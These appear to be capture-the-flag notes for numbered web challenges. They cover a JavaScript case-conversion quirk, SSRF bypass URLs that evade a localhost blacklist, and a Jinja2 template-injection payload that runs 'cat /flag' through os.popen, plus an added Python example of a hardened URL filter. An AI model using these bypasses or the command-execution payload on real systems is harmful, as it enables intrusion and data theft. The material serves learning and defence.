web334 little trick: tests a JavaScript case-conversion quirk. Reference: https://www.leavesongs.com/HTML/javascript-up-low-ercase-tip.html
toUpperCase():
ı ==> I
ſ ==> S
toLowerCase():
İ ==> ......
web351: access flag.php directly.
Pass the parameter via POST.
352, 353: the scheme is restricted to HTTP, and localhost and 127.0.0.1 are banned.
payload:
url=http://127.1/flag.php
url=http://0/flag.php
url=http://0.0.0.0/flag.php ......
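Why the 352/353 string blacklist fails, shown as an added example that is not code from the challenge or the original post: the naive check only looks for the two banned strings, while the hardened check normalizes the host to an address before deciding. The function names and the ALLOWED_HOSTS allowlist are assumptions made for this illustration.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Hypothetical allowlist of external DNS names (assumption for this example).
ALLOWED_HOSTS = {"example.com"}


def naive_filter(url):
    """Blacklist as described for 352/353: HTTP(S) only, two banned strings."""
    if urlsplit(url).scheme not in ("http", "https"):
        return False
    return not any(bad in url for bad in ("localhost", "127.0.0.1"))


def normalize_host(host):
    """Return the IP address a host literal denotes, or None for a DNS name."""
    try:
        # inet_aton accepts the legacy IPv4 shorthand forms such as "127.1" and "0".
        return ipaddress.IPv4Address(socket.inet_aton(host))
    except (OSError, ValueError):
        pass
    try:
        return ipaddress.ip_address(host)  # IPv6 literal
    except ValueError:
        return None


def hardened_filter(url):
    """Allow only globally routable IP literals or allowlisted DNS names."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    ip = normalize_host(parts.hostname)
    if ip is None:
        # DNS names: the resolved address needs the same check at connect time.
        return parts.hostname.lower() in ALLOWED_HOSTS
    return ip.is_global


# The URLs listed on this page, plus the literal the blacklist does catch.
PAGE_URLS = ["http://127.1/flag.php", "http://0/flag.php", "http://0.0.0.0/flag.php"]

if __name__ == "__main__":
    for u in PAGE_URLS + ["http://127.0.0.1/flag.php"]:
        print(u, "naive:", naive_filter(u), "hardened:", hardened_filter(u))
```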
361 362
{{ config.__class__.__init__.__globals__['os'].popen('cat /flag').read() }}
363: quotes are filtered.
{{config.__class ......